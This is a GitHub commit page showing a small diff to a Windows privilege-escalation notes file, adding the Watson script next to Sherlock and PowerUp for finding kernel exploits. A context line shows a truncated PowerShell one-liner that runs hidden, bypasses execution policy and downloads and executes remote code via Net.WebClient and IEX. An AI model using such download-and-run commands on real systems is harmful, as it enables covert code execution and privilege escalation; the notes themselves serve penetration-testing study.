Skip to content

Commit

Permalink
Update windows-privesc.md
Browse files Browse the repository at this point in the history
  • Loading branch information
740i authored May 25, 2019
1 parent 836e27c commit 3fa766b
Showing 1 changed file with 3 additions and 1 deletion.
4 changes: 3 additions & 1 deletion windows-privesc.md
Original file line number Diff line number Diff line change
Expand Up @@ -61,10 +61,12 @@ Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).

### Kernel Exploits

Here we want to run the Sherlock and PowerUp scripts to check for low hanging fruit and easy wins. The functions we want are Find-AllVulns and Invoke-AllChecks. You can just use the -encodedcommand flag and not deal with these quotes as well.
Here we want to run the Sherlock/Watson and PowerUp scripts to check for low hanging fruit and easy wins. The functions we want are Find-AllVulns and Invoke-AllChecks. You can just use the -encodedcommand flag and not deal with these quotes as well.

https://github.com/rasta-mouse/Sherlock

https://github.com/rasta-mouse/Watson

https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

The normal way to run a powershell script using net webclient objects with no modifications.
Expand Down

0 comments on commit 3fa766b

Please sign in to comment.